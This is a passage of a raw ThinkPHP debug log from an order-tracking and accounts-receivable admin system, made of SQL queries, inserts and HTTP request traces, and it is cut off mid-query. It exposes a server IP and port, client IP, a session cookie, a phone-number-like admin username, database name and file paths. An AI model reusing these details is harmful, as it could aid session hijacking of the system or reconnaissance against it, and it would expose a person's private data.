`aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000429s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001064s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001133s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001556s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000561s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001397s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001359s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001447s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001047s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001086s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '1759' [ RunTime:0.002749s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5040,`price`=4.4,`money`=22176 WHERE `id` = 3058 [ RunTime:0.003887s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.001695s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001335s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (152 , 40 , 6602 , 1238 , 1759 , 3058 , 1 , 2022 , 7 , 20 , '320w-14底壳5040个' , 1658308295 , 22176 , 7806947.82) [ RunTime:0.003723s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5040,`price`=1.9,`money`=9576 WHERE `id` = 3059 [ RunTime:0.007421s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.006614s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (152 , 40 , 6603 , 1072 , 1759 , 3059 , 1 , 2022 , 7 , 20 , '320W-9上盖5040个' , 1658308295 , 9576 , 7816523.82) [ RunTime:0.005135s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10304,`price`=1.4,`money`=14425.6 WHERE `id` = 3060 [ RunTime:0.004951s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001499s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (152 , 40 , 6604 , 1126 , 1759 , 3060 , 1 , 2022 , 7 , 20 , '20W-5底壳T1.010304个' , 1658308295 , 14425.6 , 7821373.42) [ RunTime:0.005024s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10304,`price`=0.6,`money`=6182.4 WHERE `id` = 3061 [ RunTime:0.005846s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001355s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (152 , 40 , 6605 , 1129 , 1759 , 3061 , 1 , 2022 , 7 , 20 , '20W-5上盖10304个' , 1658308295 , 6182.4 , 7813130.22) [ RunTime:0.005020s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5016,`price`=2.64,`money`=12487.2 WHERE `id` = 3062 [ RunTime:0.004790s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001248s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (152 , 40 , 6606 , 1266 , 1759 , 3062 , 1 , 2022 , 7 , 20 , '200W-14底壳切口5016个' , 1658308295 , 12487.2 , 7819435.02) [ RunTime:0.004222s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5016,`price`=1.5,`money`=7524 WHERE `id` = 3063 [ RunTime:0.003544s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001355s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (152 , 40 , 6607 , 1078 , 1759 , 3063 , 1 , 2022 , 7 , 20 , '200W-8网盖5016个' , 1658308295 , 7524 , 7814471.82) [ RunTime:0.004743s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10080,`price`=0.6,`money`=6048 WHERE `id` = 3064 [ RunTime:0.005051s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001529s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (152 , 40 , 6608 , 1040 , 1759 , 3064 , 1 , 2022 , 7 , 20 , '320W-6散热器10080个' , 1658308295 , 6048 , 7812995.82) [ RunTime:0.004877s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=8448,`price`=0.6,`money`=5068.8 WHERE `id` = 3065 [ RunTime:0.004286s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001776s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (152 , 40 , 6609 , 1045 , 1759 , 3065 , 1 , 2022 , 7 , 20 , '200W-8散热器8448个' , 1658308295 , 5068.8 , 7812016.62) [ RunTime:0.005594s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001515s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u9ec4\",\"152\"],\"verify_amount\":[\"5040\",\"5040\",\"10304\",\"10304\",\"5016\",\"5016\",\"10080\",\"8448\"],\"price\":[\"4.4\",\"1.9\",\"1.4000000000\",\"0.6\",\"2.6400000000\",\"1.5\",\"0.6\",\"0.6\"],\"money\":[\"22176\",\"9576\",\"14425.6000000000\",\"6182.4\",\"12487.2\",\"7524\",\"6048\",\"5068.8\"],\"explain\":[\"320w-14\\u5e95\\u58f35040\\u4e2a\",\"320W-9\\u4e0a\\u76d65040\\u4e2a\",\"20W-5\\u5e95\\u58f3T1.010304\\u4e2a\",\"20W-5\\u4e0a\\u76d610304\\u4e2a\",\"200W-14\\u5e95\\u58f3\\u5207\\u53e35016\\u4e2a\",\"200W-8\\u7f51\\u76d65016\\u4e2a\",\"320W-6\\u6563\\u70ed\\u566810080\\u4e2a\",\"200W-8\\u6563\\u70ed\\u56688448\\u4e2a\"],\"shoukuan_status-1\":\"0\",\"shoukuan_status-2\":\"0\",\"shoukuan_status-3\":\"0\",\"shoukuan_status-4\":\"0\",\"shoukuan_status-5\":\"0\",\"shoukuan_status-6\":\"0\",\"shoukuan_status-7\":\"0\",\"shoukuan_status-8\":\"0\",\"ids\":\"1759\"}' , '/admin/financial/verifybill/hedui/ids/1759?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308295) [ RunTime:0.005197s ] --------------------------------------------------------------- [ 2022-07-20T17:11:35+08:00 ] 106.112.205.110 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222022-06-20+00%3A00%3A00%22%2C%22end_time%22%3A%222022-07-20+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1658306703525 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222022-06-20+00%3A00%3A00%22%2C%22end_time%22%3A%222022-07-20+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1658306703525 [运行时间:0.078886s][吞吐率:12.68req/s] [内存消耗:5,688.23kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001130s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2022-06-20 00:00:00","end_time":"2022-07-20 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1658306703525', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001616s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000176s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000540s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001341s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000398s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001145s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001237s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001722s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000362s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001462s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001094s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001024s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1655654400 ) AND ( outbound.createtime <= 1658332799 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.006861s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1655654400 ) AND ( outbound.createtime <= 1658332799 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.004139s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 1758 [ RunTime:0.003594s ] --------------------------------------------------------------- [ 2022-07-20T17:11:37+08:00 ] 106.112.205.110 GET /admin/financial/verifybill/hedui/ids/1758?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1758?dialog=1 [运行时间:0.075761s][吞吐率:13.20req/s] [内存消耗:6,269.76kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001195s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '1758', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001586s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000136s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000557s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001660s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000566s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001246s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001025s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001575s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000340s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001410s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001236s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001566s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001114s ] [ sql ] [ SQL ] SHOW 